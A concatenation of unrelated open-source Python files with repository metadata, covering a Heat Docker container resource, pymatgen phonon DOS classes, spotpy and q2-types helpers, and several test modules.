    ) = (
        'docker_endpoint', 'hostname', 'user', 'memory', 'port_specs',
        'privileged', 'tty', 'open_stdin', 'stdin_once', 'env', 'cmd', 'dns',
        'image', 'volumes', 'volumes_from', 'port_bindings', 'links', 'name',
        'restart_policy', 'cap_add', 'cap_drop', 'read_only', 'cpu_shares',
        'devices', 'cpu_set'
    )

    # Attribute names resolvable through _resolve_attribute().
    ATTRIBUTES = (
        INFO, NETWORK_INFO, NETWORK_IP, NETWORK_GATEWAY,
        NETWORK_TCP_PORTS, NETWORK_UDP_PORTS, LOGS, LOGS_HEAD,
        LOGS_TAIL,
    ) = (
        'info', 'network_info', 'network_ip', 'network_gateway',
        'network_tcp_ports', 'network_udp_ports', 'logs', 'logs_head',
        'logs_tail',
    )

    _RESTART_POLICY_KEYS = (
        POLICY_NAME, POLICY_MAXIMUM_RETRY_COUNT,
    ) = (
        'Name', 'MaximumRetryCount',
    )

    _DEVICES_KEYS = (
        PATH_ON_HOST, PATH_IN_CONTAINER, PERMISSIONS
    ) = (
        'path_on_host', 'path_in_container', 'permissions'
    )

    # Linux kernel capabilities accepted by cap_add / cap_drop.
    _CAPABILITIES = ['SETPCAP', 'SYS_MODULE', 'SYS_RAWIO', 'SYS_PACCT',
                     'SYS_ADMIN', 'SYS_NICE', 'SYS_RESOURCE', 'SYS_TIME',
                     'SYS_TTY_CONFIG', 'MKNOD', 'AUDIT_WRITE',
                     'AUDIT_CONTROL', 'MAC_OVERRIDE', 'MAC_ADMIN',
                     'NET_ADMIN', 'SYSLOG', 'CHOWN', 'NET_RAW',
                     'DAC_OVERRIDE', 'FOWNER', 'DAC_READ_SEARCH', 'FSETID',
                     'KILL', 'SETGID', 'SETUID', 'LINUX_IMMUTABLE',
                     'NET_BIND_SERVICE', 'NET_BROADCAST', 'IPC_LOCK',
                     'IPC_OWNER', 'SYS_CHROOT', 'SYS_PTRACE', 'SYS_BOOT',
                     'LEASE', 'SETFCAP', 'WAKE_ALARM', 'BLOCK_SUSPEND', 'ALL']

    properties_schema = {
        DOCKER_ENDPOINT: properties.Schema(
            properties.Schema.STRING,
            _('Docker daemon endpoint (by default the local docker daemon '
              'will be used).'),
            default=None
        ),
        HOSTNAME: properties.Schema(
            properties.Schema.STRING,
            _('Hostname of the container.'),
            default=''
        ),
        USER: properties.Schema(
            properties.Schema.STRING,
            _('Username or UID.'),
            default=''
        ),
        MEMORY: properties.Schema(
            properties.Schema.INTEGER,
            _('Memory limit (Bytes).')
        ),
        PORT_SPECS: properties.Schema(
            properties.Schema.LIST,
            _('TCP/UDP ports mapping.'),
            default=None
        ),
        PORT_BINDINGS: properties.Schema(
            properties.Schema.MAP,
            _('TCP/UDP ports bindings.'),
        ),
        LINKS: properties.Schema(
            properties.Schema.MAP,
            _('Links to other containers.'),
        ),
        NAME: properties.Schema(
            properties.Schema.STRING,
            _('Name of the container.'),
        ),
        PRIVILEGED: properties.Schema(
            properties.Schema.BOOLEAN,
            _('Enable extended privileges.'),
            default=False
        ),
        TTY: properties.Schema(
            properties.Schema.BOOLEAN,
            _('Allocate a pseudo-tty.'),
            default=False
        ),
        OPEN_STDIN: properties.Schema(
            properties.Schema.BOOLEAN,
            _('Open stdin.'),
            default=False
        ),
        STDIN_ONCE: properties.Schema(
            properties.Schema.BOOLEAN,
            _('If true, close stdin after the 1 attached client disconnects.'),
            default=False
        ),
        ENV: properties.Schema(
            properties.Schema.LIST,
            _('Set environment variables.'),
        ),
        CMD: properties.Schema(
            properties.Schema.LIST,
            _('Command to run after spawning the container.'),
            default=[]
        ),
        DNS: properties.Schema(
            properties.Schema.LIST,
            _('Set custom dns servers.'),
        ),
        IMAGE: properties.Schema(
            properties.Schema.STRING,
            _('Image name.')
        ),
        VOLUMES: properties.Schema(
            properties.Schema.MAP,
            _('Create a bind mount.'),
            default={}
        ),
        VOLUMES_FROM: properties.Schema(
            properties.Schema.LIST,
            _('Mount all specified volumes.'),
            # NOTE(review): default is '' for a LIST property -- likely
            # intended to be []; left as-is to preserve behavior.
            default=''
        ),
        RESTART_POLICY: properties.Schema(
            properties.Schema.MAP,
            _('Restart policies (only supported for API version >= 1.2.0).'),
            schema={
                POLICY_NAME: properties.Schema(
                    properties.Schema.STRING,
                    _('The behavior to apply when the container exits.'),
                    default='no',
                    constraints=[
                        constraints.AllowedValues(['no', 'on-failure',
                                                   'always']),
                    ]
                ),
                POLICY_MAXIMUM_RETRY_COUNT: properties.Schema(
                    properties.Schema.INTEGER,
                    _('A maximum restart count for the '
                      'on-failure policy.'),
                    default=0
                )
            },
            default={},
            support_status=support.SupportStatus(version='2015.1')
        ),
        CAP_ADD: properties.Schema(
            properties.Schema.LIST,
            _('Be used to add kernel capabilities (only supported for '
              'API version >= 1.2.0).'),
            schema=properties.Schema(
                properties.Schema.STRING,
                _('The security features provided by Linux kernels.'),
                constraints=[
                    constraints.AllowedValues(_CAPABILITIES),
                ]
            ),
            default=[],
            support_status=support.SupportStatus(version='2015.1')
        ),
        CAP_DROP: properties.Schema(
            properties.Schema.LIST,
            _('Be used to drop kernel capabilities (only supported for '
              'API version >= 1.2.0).'),
            schema=properties.Schema(
                properties.Schema.STRING,
                _('The security features provided by Linux kernels.'),
                constraints=[
                    constraints.AllowedValues(_CAPABILITIES),
                ]
            ),
            default=[],
            support_status=support.SupportStatus(version='2015.1')
        ),
        READ_ONLY: properties.Schema(
            properties.Schema.BOOLEAN,
            _('If true, mount the container\'s root filesystem '
              'as read only (only supported for API version >= %s).') %
            MIN_API_VERSION_MAP['read_only'],
            default=False,
            support_status=support.SupportStatus(version='2015.1'),
        ),
        CPU_SHARES: properties.Schema(
            properties.Schema.INTEGER,
            _('Relative weight which determines the allocation of the CPU '
              'processing power(only supported for API version >= %s).') %
            MIN_API_VERSION_MAP['cpu_shares'],
            default=0,
            support_status=support.SupportStatus(version='5.0.0'),
        ),
        DEVICES: properties.Schema(
            properties.Schema.LIST,
            _('Device mappings (only supported for API version >= %s).') %
            MIN_API_VERSION_MAP['devices'],
            schema=properties.Schema(
                properties.Schema.MAP,
                schema={
                    PATH_ON_HOST: properties.Schema(
                        properties.Schema.STRING,
                        _('The device path on the host.'),
                        constraints=[
                            constraints.Length(max=255),
                            constraints.AllowedPattern(DEVICE_PATH_REGEX),
                        ],
                        required=True
                    ),
                    PATH_IN_CONTAINER: properties.Schema(
                        properties.Schema.STRING,
                        _('The device path of the container'
                          ' mappings to the host.'),
                        constraints=[
                            constraints.Length(max=255),
                            constraints.AllowedPattern(DEVICE_PATH_REGEX),
                        ],
                    ),
                    PERMISSIONS: properties.Schema(
                        properties.Schema.STRING,
                        _('The permissions of the container to'
                          ' read/write/create the devices.'),
                        constraints=[
                            constraints.AllowedValues(['r', 'w', 'm',
                                                       'rw', 'rm', 'wm',
                                                       'rwm']),
                        ],
                        default='rwm'
                    )
                }
            ),
            default=[],
            support_status=support.SupportStatus(version='5.0.0'),
        ),
        CPU_SET: properties.Schema(
            properties.Schema.STRING,
            _('The CPUs in which to allow execution '
              '(only supported for API version >= %s).') %
            MIN_API_VERSION_MAP['cpu_set'],
            support_status=support.SupportStatus(version='5.0.0'),
        )
    }

    attributes_schema = {
        INFO: attributes.Schema(
            _('Container info.')
        ),
        NETWORK_INFO: attributes.Schema(
            _('Container network info.')
        ),
        NETWORK_IP: attributes.Schema(
            _('Container ip address.')
        ),
        NETWORK_GATEWAY: attributes.Schema(
            _('Container ip gateway.')
        ),
        NETWORK_TCP_PORTS: attributes.Schema(
            _('Container TCP ports.')
        ),
        NETWORK_UDP_PORTS: attributes.Schema(
            _('Container UDP ports.')
        ),
        LOGS: attributes.Schema(
            _('Container logs.')
        ),
        LOGS_HEAD: attributes.Schema(
            _('Container first logs line.')
        ),
        LOGS_TAIL: attributes.Schema(
            _('Container last logs line.')
        ),
    }

    def get_client(self):
        """Return a docker-py Client for the configured endpoint, or the
        default local daemon; None when docker-py is not installed."""
        client = None
        if DOCKER_INSTALLED:
            endpoint = self.properties.get(self.DOCKER_ENDPOINT)
            if endpoint:
                client = docker.Client(endpoint)
            else:
                client = docker.Client()
        return client

    def _parse_networkinfo_ports(self, networkinfo):
        """Extract host-mapped ports from a NetworkSettings dict.

        Returns (tcp_ports, udp_ports) as comma-joined strings; entries
        without a HostPort or with a malformed 'port/proto' key are skipped.
        """
        tcp = []
        udp = []
        for port, info in six.iteritems(networkinfo['Ports']):
            p = port.split('/')
            if not info or len(p) != 2 or 'HostPort' not in info[0]:
                continue
            port = info[0]['HostPort']
            if p[1] == 'tcp':
                tcp.append(port)
            elif p[1] == 'udp':
                udp.append(port)
        return (','.join(tcp), ','.join(udp))

    def _container_networkinfo(self, client, resource_id):
        """Return the container's NetworkSettings, augmented with the
        comma-joined TcpPorts/UdpPorts host port lists.

        NOTE(review): the *resource_id* parameter is ignored -- the lookup
        always uses self.resource_id. All current callers pass
        self.resource_id anyway, so behavior is unaffected.
        """
        info = client.inspect_container(self.resource_id)
        networkinfo = info['NetworkSettings']
        ports = self._parse_networkinfo_ports(networkinfo)
        networkinfo['TcpPorts'] = ports[0]
        networkinfo['UdpPorts'] = ports[1]
        return networkinfo

    def _resolve_attribute(self, name):
        """Resolve template attributes (info, network_*, logs*) via docker
        inspect/logs calls; returns None until the container exists."""
        if not self.resource_id:
            return
        if name == 'info':
            client = self.get_client()
            return client.inspect_container(self.resource_id)
        if name == 'network_info':
            client = self.get_client()
            networkinfo = self._container_networkinfo(client, self.resource_id)
            return networkinfo
        if name == 'network_ip':
            client = self.get_client()
            networkinfo = self._container_networkinfo(client, self.resource_id)
            return networkinfo['IPAddress']
        if name == 'network_gateway':
            client = self.get_client()
            networkinfo = self._container_networkinfo(client, self.resource_id)
            return networkinfo['Gateway']
        if name == 'network_tcp_ports':
            client = self.get_client()
            networkinfo = self._container_networkinfo(client, self.resource_id)
            return networkinfo['TcpPorts']
        if name == 'network_udp_ports':
            client = self.get_client()
            networkinfo = self._container_networkinfo(client, self.resource_id)
            return networkinfo['UdpPorts']
        if name == 'logs':
            client = self.get_client()
            logs = client.logs(self.resource_id)
            return logs
        if name == 'logs_head':
            client = self.get_client()
            logs = client.logs(self.resource_id)
            return logs.split('\n')[0]
        if name == 'logs_tail':
            client = self.get_client()
            logs = client.logs(self.resource_id)
            return logs.split('\n').pop()

    def handle_create(self):
        """Pull the image, create the container, record its id as the
        resource id, then start it with the optional host-side settings."""
        create_args = {
            'image': self.properties[self.IMAGE],
            'command': self.properties[self.CMD],
            'hostname': self.properties[self.HOSTNAME],
            'user': self.properties[self.USER],
            'stdin_open': self.properties[self.OPEN_STDIN],
            'tty': self.properties[self.TTY],
            'mem_limit': self.properties[self.MEMORY],
            'ports': self.properties[self.PORT_SPECS],
            'environment': self.properties[self.ENV],
            'dns': self.properties[self.DNS],
            'volumes': self.properties[self.VOLUMES],
            'name': self.properties[self.NAME],
            'cpu_shares': self.properties[self.CPU_SHARES],
            'cpuset': self.properties[self.CPU_SET]
        }
        client = self.get_client()
        client.pull(self.properties[self.IMAGE])
        result = client.create_container(**create_args)
        container_id = result['Id']
        self.resource_id_set(container_id)

        # Only non-default start options are forwarded to docker.
        start_args = {}

        if self.properties[self.PRIVILEGED]:
            start_args[self.PRIVILEGED] = True
        if self.properties[self.VOLUMES]:
            start_args['binds'] = self.properties[self.VOLUMES]
        if self.properties[self.VOLUMES_FROM]:
            start_args['volumes_from'] = self.properties[self.VOLUMES_FROM]
        if self.properties[self.PORT_BINDINGS]:
            start_args['port_bindings'] = self.properties[self.PORT_BINDINGS]
        if self.properties[self.LINKS]:
            start_args['links'] = self.properties[self.LINKS]
        if self.properties[self.RESTART_POLICY]:
            start_args['restart_policy'] = self.properties[self.RESTART_POLICY]
        if self.properties[self.CAP_ADD]:
            start_args['cap_add'] = self.properties[self.CAP_ADD]
        if self.properties[self.CAP_DROP]:
            start_args['cap_drop'] = self.properties[self.CAP_DROP]
        if self.properties[self.READ_ONLY]:
            start_args[self.READ_ONLY] = True
        # Device mappings are redundant for privileged containers, which
        # already see all host devices.
        if (self.properties[self.DEVICES] and
                not self.properties[self.PRIVILEGED]):
            start_args['devices'] = self._get_mapping_devices(
                self.properties[self.DEVICES])

        client.start(container_id, **start_args)
        return container_id

    def _get_mapping_devices(self, devices):
        """Convert device property maps into docker's
        'host_path:container_path:permissions' strings; a missing container
        path defaults to the host path."""
        actual_devices = []
        for device in devices:
            if device[self.PATH_IN_CONTAINER]:
                actual_devices.append(':'.join(
                    [device[self.PATH_ON_HOST],
                     device[self.PATH_IN_CONTAINER],
                     device[self.PERMISSIONS]]))
            else:
                actual_devices.append(':'.join(
                    [device[self.PATH_ON_HOST],
                     device[self.PATH_ON_HOST],
                     device[self.PERMISSIONS]]))
        return actual_devices

    def _get_container_status(self, container_id):
        """Return the 'State' dict of docker inspect for *container_id*."""
        client = self.get_client()
        info = client.inspect_container(container_id)
        return info['State']

    def check_create_complete(self, container_id):
        """Creation completes once the container is running; a non-zero
        exit code marks the resource failed with the logs as the reason."""
        status = self._get_container_status(container_id)
        exit_status = status.get('ExitCode')
        if exit_status is not None and exit_status != 0:
            logs = self.get_client().logs(self.resource_id)
            raise exception.ResourceInError(resource_status=self.FAILED,
                                            status_reason=logs)
        return status['Running']

    def handle_delete(self):
        """Kill the container; a 404 (already gone) is tolerated."""
        if self.resource_id is None:
            return
        client = self.get_client()
        try:
            client.kill(self.resource_id)
        except docker.errors.APIError as ex:
            if ex.response.status_code != 404:
                raise
        return self.resource_id

    def check_delete_complete(self, container_id):
        """Deletion completes when the container stopped or disappeared."""
        if container_id is None:
            return True
        try:
            status = self._get_container_status(container_id)
        except docker.errors.APIError as ex:
            if ex.response.status_code == 404:
                return True
            raise
        return (not status['Running'])

    def handle_suspend(self):
        """Stop the container (suspend maps to 'docker stop')."""
        if not self.resource_id:
            return
        client = self.get_client()
        client.stop(self.resource_id)
        return self.resource_id

    def check_suspend_complete(self, container_id):
        status = self._get_container_status(container_id)
        return (not status['Running'])

    def handle_resume(self):
        """Restart the stopped container (resume maps to 'docker start')."""
        if not self.resource_id:
            return
        client = self.get_client()
        client.start(self.resource_id)
        return self.resource_id

    def check_resume_complete(self, container_id):
        status = self._get_container_status(container_id)
        return status['Running']

    def validate(self):
        super(DockerContainer, self).validate()
        self._validate_arg_for_api_version()

    def _validate_arg_for_api_version(self):
        """Reject properties that need a newer docker API version than the
        endpoint provides; the endpoint version is fetched lazily, only
        when at least one version-gated property is set."""
        version = None
        for key in MIN_API_VERSION_MAP:
            if self.properties[key]:
                if not version:
                    client = self.get_client()
                    version = client.version()['ApiVersion']
                min_version = MIN_API_VERSION_MAP[key]
                if compare_version(min_version, version) < 0:
                    raise InvalidArgForVersion(arg=key,
                                               min_version=min_version)
def resource_mapping():
    """Map the heat resource type name to its implementing class."""
    return {'DockerInc::Docker::Container': DockerContainer}
def available_resource_mapping():
    """Expose the resource mapping only when docker-py is importable;
    otherwise warn and register nothing."""
    if not DOCKER_INSTALLED:
        LOG.warning(_LW("Docker plug-in loaded, but docker lib "
                        "not installed."))
        return {}
    return resource_mapping()
def compare_version(v1, v2):
    """Compare two dotted version strings.

    Returns 0 when equal, -1 when *v1* is the newer version and 1 when
    *v2* is the newer one (note the sign is inverted relative to cmp()).
    """
    lhs = distutils.version.StrictVersion(v1)
    rhs = distutils.version.StrictVersion(v2)
    if lhs == rhs:
        return 0
    return -1 if lhs > rhs else 1
class InvalidArgForVersion(exception.HeatException):
    # Raised when a property requires a newer docker API version than the
    # endpoint provides (see MIN_API_VERSION_MAP).
    msg_fmt = _('"%(arg)s" is not supported for API version '
                '< "%(min_version)s"')
| {
"content_hash": "de3abe20fd8328335fc003694c7e17de",
"timestamp": "",
"source": "github",
"line_count": 555,
"max_line_length": 79,
"avg_line_length": 36.84324324324324,
"alnum_prop": 0.5283157276995305,
"repo_name": "dims/heat",
"id": "a87fc6ec26758f0b14acca6d1758d7a190ae6b92",
"size": "21082",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "contrib/heat_docker/heat_docker/resources/docker_container.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "7618889"
},
{
"name": "Shell",
"bytes": "32548"
}
],
"symlink_target": ""
} |
from __future__ import division, unicode_literals
import numpy as np
from pymatgen.core.structure import Structure
from pymatgen.util.coord_utils import get_linear_interpolated_value
from monty.json import MSONable
"""
This module defines classes to represent the phonon density of states, etc.
"""
class PhononDos(MSONable):
    """
    Basic DOS object. All other DOS objects are extended versions of this
    object.

    Args:
        frequencies: A sequence of frequencies in THz
        densities: A list representing the density of states.
    """

    def __init__(self, frequencies, densities):
        self.frequencies = np.array(frequencies)
        self.densities = np.array(densities)

    def get_smeared_densities(self, sigma):
        """
        Returns the densities, but with a Gaussian smearing of
        std dev sigma applied.

        Args:
            sigma: Std dev of Gaussian smearing function.

        Returns:
            Gaussian-smeared densities.
        """
        from scipy.ndimage.filters import gaussian_filter1d
        # Convert sigma from frequency units to grid points, assuming an
        # approximately uniform frequency mesh.
        diff = [self.frequencies[i + 1] - self.frequencies[i]
                for i in range(len(self.frequencies) - 1)]
        avgdiff = sum(diff) / len(diff)
        smeared_dens = gaussian_filter1d(self.densities, sigma / avgdiff)
        return smeared_dens

    def __add__(self, other):
        """
        Adds two DOS together. Checks that frequency scales are the same.
        Otherwise, a ValueError is thrown.

        Args:
            other: Another DOS object.

        Returns:
            Sum of the two DOSs.
        """
        if not all(np.equal(self.frequencies, other.frequencies)):
            raise ValueError("Frequencies of both DOS are not compatible!")
        # BUGFIX: previously this summed self.frequencies + other.frequencies,
        # so the "sum" carried twice the frequency grid instead of the
        # summed densities.
        densities = self.densities + other.densities
        return PhononDos(self.frequencies, densities)

    def __radd__(self, other):
        """
        Reflected addition of two DOS objects

        Args:
            other: Another DOS object.

        Returns:
            Sum of the two DOSs.
        """
        return self.__add__(other)

    def get_interpolated_value(self, frequency):
        """
        Returns interpolated density for a particular frequency.

        Args:
            frequency: frequency to return the density for.
        """
        return get_linear_interpolated_value(self.frequencies,
                                             self.densities, frequency)

    def __str__(self):
        """
        Returns a string which can be easily plotted (using gnuplot).
        """
        stringarray = ["#{:30s} {:30s}".format("Frequency", "Density")]
        for i, frequency in enumerate(self.frequencies):
            stringarray.append("{:.5f} {:.5f}"
                               .format(frequency, self.densities[i]))
        return "\n".join(stringarray)

    @classmethod
    def from_dict(cls, d):
        """
        Returns PhononDos object from dict representation of PhononDos.
        """
        return cls(d["frequencies"], d["densities"])

    def as_dict(self):
        """
        Json-serializable dict representation of PhononDos.
        """
        return {"@module": self.__class__.__module__,
                "@class": self.__class__.__name__,
                "frequencies": list(self.frequencies),
                "densities": list(self.densities)}
class CompletePhononDos(PhononDos):
    """
    Total phonon DOS for a structure together with the per-site
    projected DOS.

    Args:
        structure: Structure associated with this particular DOS.
        total_dos: total Dos for structure
        pdoss: The pdoss are supplied as an {Site: Densities}

    .. attribute:: pdos

        Dict of partial densities of the form {Site:Densities}
    """

    def __init__(self, structure, total_dos, pdoss):
        super(CompletePhononDos, self).__init__(
            frequencies=total_dos.frequencies, densities=total_dos.densities)
        self.pdos = pdoss
        self.structure = structure

    def get_site_dos(self, site):
        """
        Return the projected DOS for *site* as a PhononDos.

        Args:
            site: Site in Structure associated with CompletePhononDos.
        """
        return PhononDos(self.frequencies, self.pdos[site])

    def get_element_dos(self):
        """
        Return the projected DOS summed per element.

        Returns:
            dict of {Element: Dos}
        """
        summed = {}
        for site, site_densities in self.pdos.items():
            species = site.specie
            if species not in summed:
                summed[species] = site_densities
            else:
                # NOTE: += mirrors the original accumulation exactly (it is
                # in-place when the densities are numpy arrays).
                summed[species] += site_densities
        return {species: PhononDos(self.frequencies, dens)
                for species, dens in summed.items()}

    @classmethod
    def from_dict(cls, d):
        """
        Rebuild a CompletePhononDos from its as_dict() representation.
        """
        total = PhononDos.from_dict(d)
        structure = Structure.from_dict(d["structure"])
        projected = {}
        for site, site_pdos in zip(structure, d["pdos"]):
            projected[site] = site_pdos
        return cls(structure, total, projected)

    def as_dict(self):
        """
        Json-serializable dict representation of CompletePhononDos.
        """
        result = {"@module": self.__class__.__module__,
                  "@class": self.__class__.__name__,
                  "structure": self.structure.as_dict(),
                  "frequencies": list(self.frequencies),
                  "densities": list(self.densities),
                  "pdos": []}
        if len(self.pdos) > 0:
            for site in self.structure:
                result["pdos"].append(list(self.pdos[site]))
        return result

    def __str__(self):
        return "Complete phonon DOS for " + str(self.structure)
| {
"content_hash": "5c575ddaaa865957328e407b65ccdb2b",
"timestamp": "",
"source": "github",
"line_count": 191,
"max_line_length": 77,
"avg_line_length": 30.31413612565445,
"alnum_prop": 0.573747841105354,
"repo_name": "xhqu1981/pymatgen",
"id": "03b099df6b0c1af8c108838bd71e9789524703b5",
"size": "5900",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "pymatgen/phonon/dos.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "838"
},
{
"name": "Common Lisp",
"bytes": "3029065"
},
{
"name": "Perl",
"bytes": "229104"
},
{
"name": "Propeller Spin",
"bytes": "4026362"
},
{
"name": "Python",
"bytes": "5608308"
},
{
"name": "Roff",
"bytes": "868"
}
],
"symlink_target": ""
} |
from importlib import import_module
def __dir__():
    """
    Report the names of all selectable database backends without importing
    them (pairs with __getattr__ below for lazy loading).
    :return: list of backend names
    """
    import pkgutil

    module_names = []
    for _importer, mod_name, is_pkg in pkgutil.iter_modules(__path__):
        # 'base' is the abstract implementation, not a selectable backend
        if not is_pkg and mod_name != "base":
            module_names.append(mod_name)
    return module_names + ["custom", "noData"]
def __getattr__(name):
    """Lazily import and return the database backend class called *name*.

    Falls back to the ``base`` module when the backend's own module cannot
    be imported (e.g. optional dependencies missing).

    Raises:
        AttributeError: when *name* is not a known backend.
    """
    names = __dir__()
    # BUGFIX: removed a leftover debug print(names) that spammed stdout on
    # every attribute lookup.
    if name in names:
        try:
            db_module = import_module("." + name, __name__)
        except ImportError:
            db_module = import_module(".base", __name__)
        return getattr(db_module, name)
    # BUGFIX: the message previously contained a literal "{}" because the
    # .format(name) call was missing.
    raise AttributeError("{} is not a member of spotpy.database".format(name))
def get_datawriter(dbformat, *args, **kwargs):
    """Given a dbformat (ram, csv, sql, noData, etc), look up the matching
    datawriter class via __getattr__ and return an instance constructed
    with the remaining arguments.
    """
    writer_class = __getattr__(dbformat)
    return writer_class(*args, **kwargs)
| {
"content_hash": "4e3f2737541590f8d527b2cf41f74fc6",
"timestamp": "",
"source": "github",
"line_count": 39,
"max_line_length": 76,
"avg_line_length": 26.846153846153847,
"alnum_prop": 0.5931232091690545,
"repo_name": "thouska/spotpy",
"id": "89ed286f7f280585f68117941cec6cbfd9622867",
"size": "1047",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/spotpy/database/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "1032"
},
{
"name": "Cython",
"bytes": "4110"
},
{
"name": "Makefile",
"bytes": "433"
},
{
"name": "Python",
"bytes": "690905"
},
{
"name": "Shell",
"bytes": "304"
}
],
"symlink_target": ""
} |
import skbio
from ..plugin_setup import plugin
from . import NewickFormat
@plugin.register_transformer
def _1(data: skbio.TreeNode) -> NewickFormat:
    """Serialize a TreeNode into a NewickFormat file."""
    result = NewickFormat()
    with result.open() as fh:
        data.write(fh, format='newick')
    return result
@plugin.register_transformer
def _2(ff: NewickFormat) -> skbio.TreeNode:
    """Load a TreeNode from a NewickFormat file (skipping validation)."""
    with ff.open() as fh:
        tree = skbio.TreeNode.read(fh, format='newick', verify=False)
    return tree
| {
"content_hash": "d3a2cd4aa0d8991a020753685bdc9a8a",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 69,
"avg_line_length": 23.72222222222222,
"alnum_prop": 0.6908665105386417,
"repo_name": "qiime2/q2-types",
"id": "cfa5e93485781135167fa00203c319d4d9e980e8",
"size": "777",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "q2_types/tree/_transformer.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "269"
},
{
"name": "Python",
"bytes": "418135"
},
{
"name": "TeX",
"bytes": "1121"
}
],
"symlink_target": ""
} |
import unittest
from bok_choy.web_app_test import WebAppTest
from pages import GitHubSearchPage, GitHubSearchResultsPage
class TestGitHub(WebAppTest):
    """
    Tests for the GitHub site.
    """
    def setUp(self):
        """
        Instantiate the page object.
        """
        super().setUp()
        # page object wrapping the GitHub search UI (self.browser is
        # provided by WebAppTest)
        self.github_search_page = GitHubSearchPage(self.browser)

    def test_page_existence(self):
        """
        Make sure that the page is accessible.
        """
        self.github_search_page.visit()

    def test_search(self):
        """
        Make sure that you can search for something.
        """
        self.github_search_page.visit().search_for_terms('user:openedx repo:edx-platform')
# Allow running this test module directly (outside a test runner).
if __name__ == '__main__':
    unittest.main()
| {
"content_hash": "9691bc13ddcabbccd294032f631c01be",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 90,
"avg_line_length": 24.612903225806452,
"alnum_prop": 0.6081258191349934,
"repo_name": "edx/bok-choy",
"id": "52fda6b14dab0e5f33fb9dd8990fd8a9ac9b0e04",
"size": "763",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "docs/code/round_2/test_search.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "11992"
},
{
"name": "JavaScript",
"bytes": "1203"
},
{
"name": "Makefile",
"bytes": "2497"
},
{
"name": "Python",
"bytes": "181702"
}
],
"symlink_target": ""
} |
"""
Base Service class, which acts as a descriptor for an OpenStack service
in the test environment
"""
class Service(object):
    """Descriptor for one OpenStack service in the test environment."""
    def __init__(self, config):
        """Store the configuration for later use by subclasses.

        :param config: `tempest.config.Config` object
        """
        self.config = config
    def get_client(self):
        """Return a client object for querying the service API.

        Concrete subclasses must override this.
        """
        raise NotImplementedError
| {
"content_hash": "34cbcf92d4af2a6bd1ced8aecbdcc7a9",
"timestamp": "",
"source": "github",
"line_count": 22,
"max_line_length": 71,
"avg_line_length": 21.40909090909091,
"alnum_prop": 0.5944798301486199,
"repo_name": "armando-migliaccio/tempest",
"id": "e21092677d1f837c4c344330fd80f9aa0059c2a2",
"size": "1152",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "tempest/services/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1966096"
},
{
"name": "Shell",
"bytes": "5228"
}
],
"symlink_target": ""
} |
import os
import re
import numpy as np
import pytest
from astropy.table import Table
import astropy.coordinates as coord
import astropy.units as u
from astroquery.utils.testing_tools import MockResponse
from astroquery.utils import commons
from astroquery.ipac.irsa import Irsa, conf
from astroquery.ipac import irsa
# Maps each spatial query type to its canned response file under tests/data.
DATA_FILES = {'Cone': 'Cone.xml',
              'Box': 'Box.xml',
              'Polygon': 'Polygon.xml'}
# The same sky position (M31) expressed three ways: object name,
# sexagesimal string, and a Galactic coordinate object.
OBJ_LIST = ["m31", "00h42m44.330s +41d16m07.50s",
            commons.GalacticCoordGenerator(l=121.1743, b=-21.5733,
                                           unit=(u.deg, u.deg))]
def data_path(filename):
    """Return the path of *filename* inside this test module's data directory."""
    return os.path.join(os.path.dirname(__file__), 'data', filename)
@pytest.fixture
def patch_get(request):
    """Fixture routing ``Irsa._request`` to the canned-response mock."""
    monkeypatch = request.getfixturevalue("monkeypatch")
    monkeypatch.setattr(Irsa, '_request', get_mockreturn)
    return monkeypatch
def get_mockreturn(method, url, params=None, timeout=10, cache=False, **kwargs):
    """Stand-in for ``Irsa._request`` returning a canned XML response.

    The response file is selected by the ``spatial`` query parameter.
    """
    filename = data_path(DATA_FILES[params['spatial']])
    # Use a context manager so the file handle is closed (the original
    # left it open until garbage collection).
    with open(filename, 'rb') as fileobj:
        content = fileobj.read()
    return MockResponse(content, **kwargs)
@pytest.mark.parametrize(('dim'),
                         ['5d0m0s', 0.3 * u.rad, '5h0m0s', 2 * u.arcmin])
def test_parse_dimension(dim):
    """Angle inputs in assorted units must normalise to arcsec/arcmin/deg."""
    # check that the returned dimension is always in units of 'arcsec',
    # 'arcmin' or 'deg'
    new_dim = irsa.core._parse_dimension(dim)
    assert new_dim.unit in ['arcsec', 'arcmin', 'deg']
@pytest.mark.parametrize(('ra', 'dec', 'expected'),
                         [(10, 10, '10 +10'),
                          (10.0, -11, '10.0 -11')
                          ])
def test_format_decimal_coords(ra, dec, expected):
    """Non-negative declinations gain an explicit '+'; numeric repr is kept."""
    out = irsa.core._format_decimal_coords(ra, dec)
    assert out == expected
@pytest.mark.parametrize(('coordinates', 'expected'),
                         [("5h0m0s 0d0m0s", "75.0 +0.0")
                          ])
def test_parse_coordinates(coordinates, expected):
    """Sexagesimal input is converted to decimal degrees."""
    out = irsa.core._parse_coordinates(coordinates)
    for a, b in zip(out.split(), expected.split()):
        try:
            # Compare numerically where both tokens parse as floats ...
            a = float(a)
            b = float(b)
            np.testing.assert_almost_equal(a, b)
        except ValueError:
            # ... and fall back to exact string comparison otherwise.
            assert a == b
def test_args_to_payload():
    """The default payload carries the catalog name plus module defaults."""
    out = Irsa._args_to_payload("fp_psc")
    assert out == dict(catalog='fp_psc', outfmt=3, outrows=conf.row_limit,
                       selcols='')
@pytest.mark.parametrize(("coordinates"), OBJ_LIST)
def test_query_region_cone_async(coordinates, patch_get):
response = Irsa.query_region_async(
coordinates, catalog='fp_psc', spatial='Cone',
radius=2 * u.arcmin, get_query_payload=True)
assert response['radius'] == 2
assert response['radunits'] == 'arcmin'
response = Irsa.query_region_async(
coordinates, catalog='fp_psc', spatial='Cone', radius=2 * u.arcmin)
assert response is not None
